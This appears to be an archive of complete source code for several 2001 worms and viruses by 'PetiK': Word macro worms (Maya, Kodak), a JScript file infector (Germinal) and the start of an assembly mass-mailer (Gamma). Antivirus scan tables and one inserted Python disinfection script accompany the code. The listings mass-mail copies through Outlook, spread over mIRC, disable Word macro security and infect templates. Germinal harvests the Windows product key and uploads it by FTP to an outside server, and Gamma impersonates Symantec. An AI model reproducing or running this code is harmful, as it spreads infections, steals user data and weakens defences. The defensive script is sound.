AhnLab-V3 | 5.0.0.2 | 2009.05.15 | HTML/Petik
AntiVir | 7.9.0.168 | 2009.05.15 | Worm/Petik.J
Antiy-AVL | 2.0.3.1 | 2009.05.15 | Worm/Win32.Petik
Authentium | 5.1.2.4 | 2009.05.15 | VBS/Embargo.A
Avast | 4.8.1335.0 | 2009.05.15 | BV:KillAll
AVG | 8.5.0.336 | 2009.05.15 | VBS/Bother
BitDefender | 7.2 | 2009.05.16 | VBS.Embargo.A
CAT-QuickHeal | 10.00 | 2009.05.15 | VBS.Petik.J
ClamAV | 0.94.1 | 2009.05.15 | -
Comodo | 1157 | 2009.05.08 | Unclassified Malware
DrWeb | 5.0.0.12182 | 2009.05.16 | VBS.Generic.262
eSafe | 7.0.17.0 | 2009.05.14 | Email-Win32.Petik.j
eTrust-Vet | 31.6.6508 | 2009.05.16 | VBS/Both
F-Prot | 4.4.4.56 | 2009.05.15 | VBS/Embargo.A
F-Secure | 8.0.14470.0 | 2009.05.15 | Email-Worm.Win32.Petik.j
Fortinet | 3.117.0.0 | 2009.05.16 | VBS/Petik.J!worm
GData | 19 | 2009.05.16 | VBS.Embargo.A
Ikarus | T3.1.1.49.0 | 2009.05.16 | VBS.Embargo
K7AntiVirus | 7.10.735 | 2009.05.14 | -
Kaspersky | 7.0.0.125 | 2009.05.16 | Email-Worm.Win32.Petik.j
McAfee | 5616 | 2009.05.15 | VBS/Ergo.intd
McAfee+Artemis | 5616 | 2009.05.15 | VBS/Ergo.intd
McAfee-GW-Edition | 6.7.6 | 2009.05.15 | Worm.Petik.J
Microsoft | 1.4602 | 2009.05.16 | Virus:VBS/Petik.J
NOD32 | 4080 | 2009.05.15 | VBS/Petik.J
Norman | 6.01.05 | 2009.05.16 | mIRC/Gen_HTM
nProtect | 2009.1.8.0 | 2009.05.16 | VBS.Embargo.A
Panda | 10.0.0.14 | 2009.05.15 | HTML/Embargo
PCTools | 4.4.2.0 | 2009.05.15 | VBS.Embargo.A
Prevx | 3.0 | 2009.05.16 | -
Rising | 21.29.52.00 | 2009.05.16 | VBS.Petik.j
Sophos | 4.41.0 | 2009.05.16 | VBS/Ergo-A
Sunbelt | 3.2.1858.2 | 2009.05.16 | -
Symantec | 1.4.4.12 | 2009.05.16 | VBS.Embaro.A.Intd
TheHacker | 6.3.4.1.326 | 2009.05.15 | -
TrendMicro | 8.950.0.1092 | 2009.05.15 | -
VBA32 | 3.12.10.5 | 2009.05.16 | Email-Worm.Win32.Petik.j
ViRobot | 2009.5.15.1737 | 2009.05.15 | -
VirusBuster | 4.6.5.0 | 2009.05.15 | VBS.Embargo.A
Additional information
File size: 4085 bytes
MD5...: 4ec0004fb7f700df736ae4d3c2c22919
SHA1..: 464dec7db3865638af142f5e8929fcd49e5af667

' Worm Name : W97M.Maya.A
' Author : PetiK
' Language : VBA Word
' Date : May 29th – June 1st 2001
' Size : 33792 – 33280 (with change) bytes
'
' Changes the properties of the document. If the value “W97M.Maya” does not exist in
' the key HKLM\Software\, the worm copies itself to C:\Windows\Maya.doc. It creates
' the “C:\Maya” directory with a TXT file and a script file to infect mIRC
' channels. Afterwards, it spreads with Microsoft Outlook.
' Subject : “Hi man, it’s ” + user name
' Body : “This is the new net Story”
' “It ‘s great”
' Attachment : Maya.doc
' On the 5th of the month, when the document is closed, a message box appears.
' When Visual Basic is active, another message box appears and the worm
' adds a value in the “Run” key of the registry to disable the mouse.
Sub AutoOpen()
On Error Resume Next
With Dialogs(wdDialogFileSummaryInfo)
.Author = "PetiK"
.Title = "W97M.Maya"
.Comments = "To my best GirlFriend"
.Keywords = "Maya, Bzzbzz, to grow"
.Execute
End With
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\", "W97M.Maya") <> "Par PetiK" Then
ActiveDocument.SaveAs FileName:="C:\Windows\Maya.doc"
ActiveDocument.Saved = True
FileSystem.MkDir "C:\Maya"
Open "C:\Maya\hello.txt" For Output As #1
Print #1, "Le 29 mai 2001 à Munster"
Print #1, "This is my first W97M.Outlook.Worm"
Print #1, "Its name is W97M.Maya"
Close #1
Open "C:\Maya\script.ini" For Output As #1
Print #1, "n0=on 1:JOIN:#:{"
Print #1, "n1= /if ( $nick == $me ) { halt }"
Print #1, "n2= /.dcc send $nick C:\Windows\Maya.doc"
Print #1, "n3=}"
Close #1
FileSystem.FileCopy "C:\Maya\script.ini", "C:\mirc\script.ini"
FileSystem.FileCopy "C:\Maya\script.ini", "C:\mirc32\script.ini"
FileSystem.FileCopy "C:\Maya\script.ini", "C:\progra~1\mirc\script.ini"
FileSystem.FileCopy "C:\Maya\script.ini", "C:\progra~1\mirc32\script.ini"
FileSystem.Kill "C:\Maya\script.ini"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\", "W97M.Maya") = "Par PetiK"
End If
Dim maya, bzzbzz, petik
Set maya = CreateObject("Outlook.Application")
Set bzzbzz = maya.GetNameSpace("MAPI")
If maya = "Outlook" Then
bzzbzz.Logon "profile", "password"
For mayacompte = 1 To bzzbzz.AddressLists.Count
Set AB = bzzbzz.AddressLists(mayacompte)
x = 1
Set petik = maya.CreateItem(0)
For compte = 1 To AB.AddressEntries.Count
verif = AB.AddressEntries(x)
petik.Recipients.Add verif
x = x + 1
If x > 500 Then compte = AB.AddressEntries.Count
Next compte
petik.Subject = "Hi man, it's " & Application.UserName
petik.Body = "This is the new net Story" + vbCrLf + "It's great"
petik.Attachments.Add ActiveDocument.FullName
petik.DeleteAfterSubmit = True
petik.Send
verif = ""
Next mayacompte
bzzbzz.Logoff
End If
End Sub

Sub AutoClose()
If Day(Now) = 5 Then
MsgBox "Coded by PetiK (c)2001", vbInformation, "W97M.Maya"
End If
End Sub

Sub ViewVBCode()
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "MayAttack") = "rundll32 mouse,disable"
MsgBox "Curiosity is bad" + vbCr + vbCr + "With her small size" + vbCr + "Maya is alwayas there", vbCritical, "W97M.Maya"
ShowVisualBasicEditor = True
End Sub

File Maya.doc received on 05.16.2009 17:59:46 (CET)
Antivirus | Version | Last Update | Result
a-squared | 4.0.0.101 | 2009.05.16 | Virus.MSWord.Melissa-based!IK
AhnLab-V3 | 5.0.0.2 | 2009.05.16 | W97M/Unnamed
AntiVir | 7.9.0.168 | 2009.05.15 | W2000M/Ayam.A@mm
Antiy-AVL | 2.0.3.1 | 2009.05.15 | Virus/MSWord.MSWord
Authentium | 5.1.2.4 | 2009.05.16 | W97M/Ayam.A@mm
Avast | 4.8.1335.0 | 2009.05.15 | MW97:Ayam family
AVG | 8.5.0.336 | 2009.05.15 | BAT/Generic
BitDefender | 7.2 | 2009.05.16 | W97M.Ayam.A@mm
CAT-QuickHeal | 10.00 | 2009.05.15 | W97M.Prilissa
ClamAV | 0.94.1 | 2009.05.16 | W97M.Ayam.A
Comodo | 1157 | 2009.05.08 | Virus.MSWord.Melissabased
DrWeb | 5.0.0.12182 | 2009.05.16 | X97M.Papa
eSafe | 7.0.17.0 | 2009.05.14 | O97M.GNsm
eTrust-Vet | 31.6.6508 | 2009.05.16 | W97M/Ayam.A:mm
F-Prot | 4.4.4.56 | 2009.05.16 | W97M/Ayam.A@mm
F-Secure | 8.0.14470.0 | 2009.05.15 | Virus.MSWord.Melissa-based
Fortinet | 3.117.0.0 | 2009.05.16 | W97M/Ayam.A@MM
GData | 19 | 2009.05.16 | W97M.Ayam.A@mm
Ikarus | T3.1.1.49.0 | 2009.05.16 | Virus.MSWord.Melissa-based
K7AntiVirus | 7.10.737 | 2009.05.16 | Macro.Melissa-based
Kaspersky | 7.0.0.125 | 2009.05.16 | Virus.MSWord.Melissa-based
McAfee | 5616 | 2009.05.15 | W97M/Generic@MM
McAfee+Artemis | 5616 | 2009.05.15 | W97M/Generic@MM
McAfee-GW-Edition | 6.7.6 | 2009.05.15 | Macro.Ayam.A
Microsoft | 1.4602 | 2009.05.16 | Virus:W97M/Ayam.A@mm
NOD32 | 4080 | 2009.05.15 | W97M/Ayam.A
Norman | 6.01.05 | 2009.05.16 | W97M/Ayam.A
nProtect | 2009.1.8.0 | 2009.05.16 | W97M.Ayam.A@mm
Panda | 10.0.0.14 | 2009.05.16 | W97M/Maya.Worm
PCTools | 4.4.2.0 | 2009.05.16 | WORD.97.Maya.B
Prevx | 3.0 | 2009.05.16 | -
Rising | 21.29.52.00 | 2009.05.16 | Macro.Office.Melissa-based.aa
Sophos | 4.41.0 | 2009.05.16 | WM97/Munster-A
Sunbelt | 3.2.1858.2 | 2009.05.16 | Virus.MSWord.Melissa-based (v)
Symantec | 1.4.4.12 | 2009.05.16 | W97M.OutlookWorm.Gen
TheHacker | 6.3.4.1.326 | 2009.05.15 | W2KM/Sin
TrendMicro | 8.950.0.1092 | 2009.05.15 | W97M_AYAM.A
VBA32 | 3.12.10.5 | 2009.05.16 | Virus.X97M.Papa
ViRobot | 2009.5.15.1737 | 2009.05.15 | W97M.Ayam.A
VirusBuster | 4.6.5.0 | 2009.05.16 | WORD.97.Maya.B
Additional information
File size: 33280 bytes
MD5...: ebe499343061e49ea4f31639fc3a7e59
SHA1..: 89de7abdbdc3fc8764d481a49125b8a3cebf6f05

// Name : JS.Germinal.A@mm
// Author : PetiK
// Date : June 1st – 2nd 2001
// Language : JScript
// Size of infection : 2357 bytes
// Action : It infects all *.JS files in the \WINDOWS, \WINDOWS\DESKTOP
// and \WINDOWS\SAMPLES\WSH folders.
// It creates a TXT file with system information and sends it to an ftp server.
// JS.Germinal.A@mm
var WS=WScript.CreateObject("WScript.Shell")
var fso=WScript.CreateObject("Scripting.FileSystemObject")
var win=fso.GetSpecialFolder(0)
var c=fso.OpenTextFile(WScript.ScriptFullName,1)
var virus=c.ReadAll()
var dossier=new Array()
dossier[0]=fso.GetFolder(".")
dossier[1]=win
dossier[2]=win + "\\Desktop"
dossier[3]=win + "\\SAMPLES\\WSH"
for(i=0;i<4;i++){
 infecte(dossier[i])
}
function infecte(dossier)
{
 var notredossier=fso.GetFolder(dossier)
 var fichier=new Enumerator(notredossier.Files)
 if(fso.GetExtensionName(fichier.item()).toUpperCase()=="JS")
 {
  var victime=fso.OpenTextFile(fichier.item().path,1)
  var marque=victime.Read(19)
  var victimecode=marque+victime.ReadAll()
  victime.Close()
  if(marque!="// JS.Germinal.A@mm")
  {
   var victime=fso.CreateTextFile(fichier.item().path,2)
   victime.Write(virus+victimecode)
   victime.Close()
  }
 }
}
WS.RegWrite ("HKLM\\Software\\","JS.Germinal Par PetiK 02/05/2001");
WS.RegWrite ("HKCU\\Software\\","JS.Germinal Par PetiK 02/05/2001");
var nom=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOwner")
var org=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOrganization")
var id=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ProductId")
var key=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ProductKey")
var ver=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Version")
var vernum=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\VersionNumber")
var txt=fso.CreateTextFile("C:\\"+nom+".txt",2)
txt.WriteLine ("Information de " + nom + " à " + org);
txt.WriteLine ("");
txt.WriteLine ("Numéro d'identification : " + id);
txt.WriteLine ("Numéro de la clé : " + key);
txt.WriteLine ("Version de windows : " + ver + " " + vernum);
txt.Close()
var drv=fso.CreateTextFile(win+"\\PetiK.drv",2)
drv.WriteLine ("open");
drv.WriteLine ("members.aol.com");
drv.WriteLine ("pentasm99");
drv.WriteLine ("ascii")
drv.WriteLine ("put C:\\"+nom+".txt");
drv.WriteLine ("bye");
drv.WriteLine ("exit");
drv.Close()
WS.Run ("command.com /c ftp.exe -i -v -s:"+win+"\\PetiK.drv")
// Par PetiK 2nd June 2001

File Germinal.js received on 05.16.2009 11:58:21 (CET)
Antivirus | Version | Last Update | Result
a-squared | 4.0.0.101 | 2009.05.16 | Virus.JS.Germinal!IK
AhnLab-V3 | 5.0.0.2 | 2009.05.15 | JS/Germinal
AntiVir | 7.9.0.168 | 2009.05.15 | JSC/Germinal.1
Antiy-AVL | 2.0.3.1 | 2009.05.15 | Virus/JS.JS
Authentium | 5.1.2.4 | 2009.05.15 | JS/Germinal.A
Avast | 4.8.1335.0 | 2009.05.15 | Unix:Malware-gen
AVG | 8.5.0.336 | 2009.05.15 | -
BitDefender | 7.2 | 2009.05.16 | JS.Germinal.A
CAT-QuickHeal | 10.00 | 2009.05.15 | JS_/Germinal
ClamAV | 0.94.1 | 2009.05.15 | JS.Germinal
Comodo | 1157 | 2009.05.08 | -
DrWeb | 5.0.0.12182 | 2009.05.16 | JS.Optiz
eSafe | 7.0.17.0 | 2009.05.14 | -
eTrust-Vet | 31.6.6508 | 2009.05.16 | JS/Germin
F-Prot | 4.4.4.56 | 2009.05.15 | JS/Germinal.A
F-Secure | 8.0.14470.0 | 2009.05.15 | Virus.JS.Germinal
Fortinet | 3.117.0.0 | 2009.05.16 | JS/GERMINAL.A
GData | 19 | 2009.05.16 | JS.Germinal.A
Ikarus | T3.1.1.49.0 | 2009.05.16 | Virus.JS.Germinal
K7AntiVirus | 7.10.735 | 2009.05.14 | -
Kaspersky | 7.0.0.125 | 2009.05.16 | Virus.JS.Germinal
McAfee | 5616 | 2009.05.15 | JS/Germinal
McAfee+Artemis | 5616 | 2009.05.15 | JS/Germinal
McAfee-GW-Edition | 6.7.6 | 2009.05.15 | Script.Germinal.1
Microsoft | 1.4602 | 2009.05.16 | Trojan:JS/Germinal.A
NOD32 | 4080 | 2009.05.15 | JS/Germinal.A
Norman | 6.01.05 | 2009.05.16 | JS/Germinal.B
nProtect | 2009.1.8.0 | 2009.05.16 | JS.Germinal.A
Panda | 10.0.0.14 | 2009.05.16 | -
PCTools | 4.4.2.0 | 2009.05.15 | JS.Germinal.A
Prevx | 3.0 | 2009.05.16 | -
Rising | 21.29.52.00 | 2009.05.16 | Script.Germinal.Trojan
Sophos | 4.41.0 | 2009.05.16 | JS/Germinal
Sunbelt | 3.2.1858.2 | 2009.05.16 | Virus.JS.Germinal (v)
Symantec | 1.4.4.12 | 2009.05.16 | JS.Lamnireg.A.Trojan
TheHacker | 6.3.4.1.326 | 2009.05.15 | -
TrendMicro | 8.950.0.1092 | 2009.05.15 | JS_GERMINAL.A
VBA32 | 3.12.10.5 | 2009.05.16 | Virus.JS.Germinal
ViRobot | 2009.5.15.1737 | 2009.05.15 | -
VirusBuster | 4.6.5.0 | 2009.05.15 | JS.Germinal.A
Additional information
File size: 2357 bytes
MD5...: b90254895d6169a8d111a508e2638c51
SHA1..: 7669c66d338b4208536c32924bcab95996cf8c3e

' Name : W97M.Kodak
' Author : PetiK
' Date : June 5th 2001
' Size 3,030 bytes
'
' Macro AutoOpen : Creates a “script.ini” file for mIRC. If the day is the 5th,
' the virus displays a Balloon message. It copies itself to /Windows/Kodak.doc.
'
' Macro AutoClose : It alters the macro security setting of Word 9.0 and 10.0 (2000 and XP).
' It copies its code into the file “Kodak.vxd” and puts it into “NORMAL.DOT”.
' When a new file is created, the macro code is written into that file.
' To avoid infecting “NORMAL.DOT” twice, the virus adds the value :
' HKEY_LOCAL_MACHINE\Software\Microsoft\W97M.Kodak = CliClac
'
' Macro HelpAbout : Displays another Balloon message
'
' Macro ViewVBCode : Displays a Message Box and shows the Visual Basic Editor
'
' Macro ToolsOptions and Security : Find yourself.
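The JS.Germinal listing above is a prepending infector: it reads its own text, checks the first 19 characters of each candidate .js file for its marker comment, and writes its own body in front of any file that lacks it. The Python below is an added defender's example (it is not part of this archive and not the author's code): it recognises the marker, locates the end of the prepended block by the infector's closing comment line as it appears in the listing, and strips it to recover the original script. The sample "infected" input is built from a constructed placeholder body, not the worm's code; the 2357-byte figure is the size stated in the entry and is only used as a consistency hint.

```python
"""Detect and undo a JS.Germinal-style prepender infection.

Added example for defenders; not part of the archived source. MARKER and
TRAILER are the first and last lines visible in the listing; the sample body
below is a constructed placeholder, not the worm's code."""
from typing import Optional, Tuple

MARKER = "// JS.Germinal.A@mm"          # the 19 characters the infector tests for
TRAILER = "// Par PetiK 2nd June 2001"  # last line of the infector's own text
INFECTION_SIZE = 2357                   # prepended block size stated in the entry


def is_infected(script: str) -> bool:
    """Same test the infector uses: the first 19 characters equal the marker."""
    return script[:len(MARKER)] == MARKER


def split_prepended(script: str) -> Optional[Tuple[str, str]]:
    """Return (prepended_block, original_code), or None when not infected.

    The prepended block ends at the trailer comment plus its line ending.
    A marker without a trailer is treated as unknown rather than cut blindly."""
    if not is_infected(script):
        return None
    idx = script.find(TRAILER)
    if idx < 0:
        return None
    end = idx + len(TRAILER)
    if script[end:end + 2] == "\r\n":
        end += 2
    elif script[end:end + 1] == "\n":
        end += 1
    return script[:end], script[end:]


def matches_listed_size(block: str) -> bool:
    """Consistency hint: the entry states the prepended block is 2357 bytes."""
    return len(block.encode("latin-1", errors="replace")) == INFECTION_SIZE


def disinfect(script: str) -> Tuple[str, int]:
    """Strip every leading prepended copy; return (clean_code, copies_removed).

    Each pass removes at least len(MARKER) characters, so the loop terminates."""
    removed = 0
    while True:
        parts = split_prepended(script)
        if parts is None:
            return script, removed
        script = parts[1]
        removed += 1


# Constructed sample: placeholder body between the real marker and trailer,
# prepended to a harmless one-line script.
CONSTRUCTED_BODY = MARKER + "\n// (constructed placeholder, not the worm)\n" + TRAILER + "\n"
VICTIM = 'WScript.Echo("hello from a legitimate script")\n'
INFECTED_SAMPLE = CONSTRUCTED_BODY + VICTIM

if __name__ == "__main__":
    clean, n = disinfect(INFECTED_SAMPLE)
    print("infected:", is_infected(INFECTED_SAMPLE), "copies removed:", n)
    print("recovered script:", clean.strip())
```

Because the infector only tests the first 19 characters before prepending, a file that already carries the marker is skipped, which is why the cleaner loops until no marker remains rather than assuming a single copy.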
'W97M.Kodak by PetiK 05/10/2001
Sub AutoOpen()
On Error Resume Next
ActiveDocument.SaveAs FileName:="C:\Windows\Kodak.doc"
ActiveDocument.Saved = True
Open "C:\script.drv" For Output As #1
Print #1, "n0=on 1:JOIN:#:{"
Print #1, "n1= /if ( $nick == $me ) { halt }"
Print #1, "n2= /.dcc send $nick C:\Windows\Kodak.doc"
Print #1, "n3=}"
Close #1
FileSystem.FileCopy "C:\script.drv", "C:\mirc\script.ini"
FileSystem.FileCopy "C:\script.drv", "C:\mirc32\script.ini"
FileSystem.FileCopy "C:\script.drv", "C:\progra~1\mirc\script.ini"
FileSystem.FileCopy "C:\script.drv", "C:\progra~1\mirc32\script.ini"
FileSystem.Kill "C:\script.drv"
If Day(Now) = 5 Then
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "I am always here. And you, are you here."
.Heading = "W97M.Kodak"
.Animation = msoAnimationGetAttentionMajor
.Button = msoButtonSetOK
.Show
End With
End If
End Sub

Sub AutoClose()
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> 1& Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End If
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") <> 1& Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
End If
If Dir("C:\Kodak.vxd", vbReadOnly) = "" Then
Open "C:\Kodak.vxd" For Output As #1
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
K = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
Print #1, K
Next i
Close #1
SetAttr "C:\Kodak.vxd", vbReadOnly
End If
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\", "W97M.Kodak") <> "ClicClac" Then
NormalTemplate.VBProject.VBComponents.Import "C:\Kodak.vxd"
NormalTemplate.Save
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\", "W97M.Kodak") = "ClicClac"
End If
ActiveDocument.VBProject.VBComponents.Import "C:\Kodak.vxd"
ActiveDocument.Save
End Sub

Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "Smile and cheese for the photo"
.Heading = "W97M.Kodak"
.Animation = msoAnimationGetAttentionMajor
.Button = msoButtonSetOK
.Show
End With
End Sub

Sub ViewVBCode()
MsgBox "was coded by PetiK(c)2001", vbInformation, "W97M.Kodak"
ShowVisualBasicEditor = True
End Sub

Sub ToolsOptions()
On Error Resume Next
Options.VirusProtection = 1
Options.SaveNormalPrompt = 1
Dialogs(wdDialogToolsOptions).Show
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
End Sub

Sub ToolsSecurity()
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = True
Dialogs(wdDialogToolsSecurity).Show
CommandBars("Macro").Controls("Security...").Enabled = False
End Sub

File Kodak.doc received on 05.16.2009 17:43:05 (CET)
Antivirus | Version | Last Update | Result
a-squared | 4.0.0.101 | 2009.05.16 | Virus.MSWord.Adok!IK
AhnLab-V3 | 5.0.0.2 | 2009.05.16 | W97M/Adok
AntiVir | 7.9.0.168 | 2009.05.15 | W2000M/Petman.A
Antiy-AVL | 2.0.3.1 | 2009.05.15 | Virus/MSWord.MSWord
Authentium | 5.1.2.4 | 2009.05.16 | W97M/Adok.A
Avast | 4.8.1335.0 | 2009.05.15 | MW97:Adok-A
AVG | 8.5.0.336 | 2009.05.15 | W97M/Ethan
BitDefender | 7.2 | 2009.05.16 | W97M.Kdk.A
CAT-QuickHeal | 10.00 | 2009.05.15 | W97M.ZMK.M
ClamAV | 0.94.1 | 2009.05.16 | WM.Psycho
Comodo | 1157 | 2009.05.08 | Virus.MSWord.Adok
DrWeb | 5.0.0.12182 | 2009.05.16 | W97M.Petik
eSafe | 7.0.17.0 | 2009.05.14 | O97M.GNcc
eTrust-Vet | 31.6.6508 | 2009.05.16 | W97M/Adok.A
F-Prot | 4.4.4.56 | 2009.05.16 | W97M/Adok.A
F-Secure | 8.0.14470.0 | 2009.05.15 | Virus.MSWord.Adok
Fortinet | 3.117.0.0 | 2009.05.16 | W97M/Adok.A
GData | 19 | 2009.05.16 | W97M.Kdk.A
Ikarus | T3.1.1.49.0 | 2009.05.16 | Virus.MSWord.Adok
K7AntiVirus | 7.10.737 | 2009.05.16 | Macro.Adok
Kaspersky | 7.0.0.125 | 2009.05.16 | Virus.MSWord.Adok
McAfee | 5616 | 2009.05.15 | W97M/Generic
McAfee+Artemis | 5616 | 2009.05.15 | W97M/Generic
McAfee-GW-Edition | 6.7.6 | 2009.05.15 | Macro.Petman.A
Microsoft | 1.4602 | 2009.05.16 | Virus:W97M/Adok.A
NOD32 | 4080 | 2009.05.15 | W97M/Adok.A
Norman | 6.01.05 | 2009.05.16 | W97M/Adok.A
nProtect | 2009.1.8.0 | 2009.05.16 | W97M.Kdk.A
Panda | 10.0.0.14 | 2009.05.16 | W97M/Kodak.worm
PCTools | 4.4.2.0 | 2009.05.16 | WORD.97.Adok.A
Prevx | 3.0 | 2009.05.16 | -
Rising | 21.29.52.00 | 2009.05.16 | Macro.Word97.Adok
Sophos | 4.41.0 | 2009.05.16 | WM97/Adok-A
Sunbelt | 3.2.1858.2 | 2009.05.16 | W97M.Adok (v)
Symantec | 1.4.4.12 | 2009.05.16 | W97M.Adok.A
TheHacker | 6.3.4.1.326 | 2009.05.15 | W2KM/Generico
TrendMicro | 8.950.0.1092 | 2009.05.15 | W97M_ABOTUS.A
VBA32 | 3.12.10.5 | 2009.05.16 | Virus.W97M.Ethan
ViRobot | 2009.5.15.1737 | 2009.05.15 | W97M.Adok
VirusBuster | 4.6.5.0 | 2009.05.16 | WORD.97.Adok.A
Additional information
File size: 31232 bytes
MD5...: 84a74bcf024ac4779d20e2b667bc6da6
SHA1..: 99cbae9ae51381d5f7eb637b12d42e790f48db33

comment #
Name : I-Worm.Gamma (w32gammaworm)
Author : PetiK
Date : May 29th - June 9th
Size : 8704 bytes
Action : Checks whether the file is \WINDOWS\SYSTEM\SETUP.EXE. If it is not, it copies itself to \WINDOWS\SYSTEM\SETUP.EXE, alters the run= line in the WIN.INI file to the name of the copy and displays a message. Otherwise, it creates C:\gamma and copies it to C:\mirc, C:\mirc32, C:\progra~1\mirc or C:\progra~1\mirc32. It then creates C:\Data and puts a file info.vbs there. This file sends a message to [email protected] :
Subject : Message from + Name of the registered user
Body : Time, Date, Organization I-Worm.Gamma
On the 5th, when the day is a Wednesday, a message is displayed. When the user clicks "OK", the worm swaps the mouse buttons.
The worm waits for an active Internet connection, testing for one by trying to reach www.symantec.com. When the connection succeeds, it scans all *.*htm* files in "Temporary Internet Files" to find email addresses. When the worm finds one, it sends a copy of itself to the address :
From : snd @symantec.com
Date : 06/06/2001
Subject : Virus/Worms Fix from Symantec Corporation (Norton Antivirus)
Body : Hi, Symantec Corporation send you the last version of our tool Virus/Worms Fix. Here is the version 3.1 . This tool detect, repair and protect users against Bloodhound.IRC.Worm, Bloodhound.VBS.Worm, Bloodhound.W32 and Bloodhound.WordMacro .
With Regards, Symantec Corporation (http://www.symantec.com)
Attachment : SETUP.EXE
#
.586p
.model flat,stdcall
include useful.inc

extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn CreateDirectoryA:PROC
extrn CreateFileA:PROC
extrn CreateFileMappingA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn FindClose:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn gethostbyname:PROC
extrn GetFileSize:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetSystemTime:PROC
extrn GetWindowsDirectoryA:PROC
extrn lstrcat:PROC
extrn lstrcmp:PROC
extrn MAPILogoff:PROC
extrn MAPILogon:PROC
extrn MAPISendMail:PROC
extrn MapViewOfFile:PROC
extrn MessageBoxA:PROC
extrn RegCloseKey:PROC
extrn RegOpenKeyExA:PROC
extrn RegQueryValueExA:PROC
extrn SetCurrentDirectoryA:PROC
extrn Sleep:PROC
extrn SwapMouseButton:PROC
extrn UnmapViewOfFile:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
extrn WritePrivateProfileStringA:PROC

.data
szComName db 50 dup (0)
szOrig db 50 dup (0)
szWinini db 50 dup (0)
szTif db 7Fh dup (0)

FileHandle dd ?
RegHandle dd ?
SrchHandle dd ?
octets dd ?
ValueType dd 0
mail_address db 128 dup (?)
MAPISession dd 0

DIR db "C:\Data",00h
information db "C:\Data\info.vbs",00h
infoexec db "wscript C:\Data\info.vbs",00h
mirc db "C:\gamma",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\progra~1\mirc\script.ini",00h
script4 db "C:\progra~1\mirc32\script.ini",00h
Copie db "\SETUP.EXE",00h
Winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
TEXTE db "This file does not appear to be a Win32 valid file. ",00h
TITRE2 db "I-Worm.Gamma (c)2001",00h
TEXTE2 db "PetiK greets you",00h
symantec db "www.symantec.com",00h
tempnetfile db "\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders",00h
Value db "Cache",00h
FICHIER db "*.*htm*",00h

CREATE_NEW equ 00000001h
CREATE_ALWAYS equ 00000002h
FILE_ATTRIBUTE_READONLY equ 00000001h
FILE_ATTRIBUTE_NORMAL equ 00000080h
FILE_MAP_READ equ 00000004h
FILE_SHARE_READ equ 00000001h
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
HKEY_USERS equ 80000003h
KEY_QUERY_VALUE equ 00000001h
KEY_SET_VALUE equ 00000002h
MAX_PATH equ 260
OPEN_EXISTING equ 00000003h
PAGE_READONLY equ 00000002h
REG_SZ equ 00000001h

SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
SystemTime SYSTIME <>

time struc
LowDateTime dd ?
HighDateTime dd ?
time ends

win32 struc
FileAttributes dd ?
CreationTime time ?
LastAccessTime time ?
LastWriteTime time ?
FileSizeHifh dd ?
FileSizeLow dd ?
Reserved0 dd ?
Reserved1 dd ?
FileName dd MAX_PATH (?)
AlternativeFileName db 13 dup (?)
db 3 dup (?)
win32 ends
CHERCHE win32 <>

mircd:
db "[script]",0dh,0ah
db ";Don't delete this file",0dh,0ah
db "n0=ON 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= /.dcc send $nick "
szCopie db 50 dup (0)
db "",0dh,0ah
db "n3=}",0dh,0ah
MIRCTAILLE equ $-mircd

infod:
db ''' Symantec ScriptBlocking Authenticated File',0dh,0ah
db ''' A3C7B6E0-5535-11D5-911D-444553546170',0dh,0ah
db '',0dh,0ah
db 'On Error Resume Next',0dh,0ah
db 'set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'set w=CreateObject("WScript.Shell")',0dh,0ah
db 'If w.RegRead("HKLM\Software\Gamma\") <> "OK" Then',0dh,0ah
db 'set o=CreateObject("Outlook.Application")',0dh,0ah
db 'set m=o.CreateItem(0)',0dh,0ah
db 'n=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")',0dh,0ah
db 'p=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")',0dh,0ah
db 'm.To = "[email protected]"',0dh,0ah
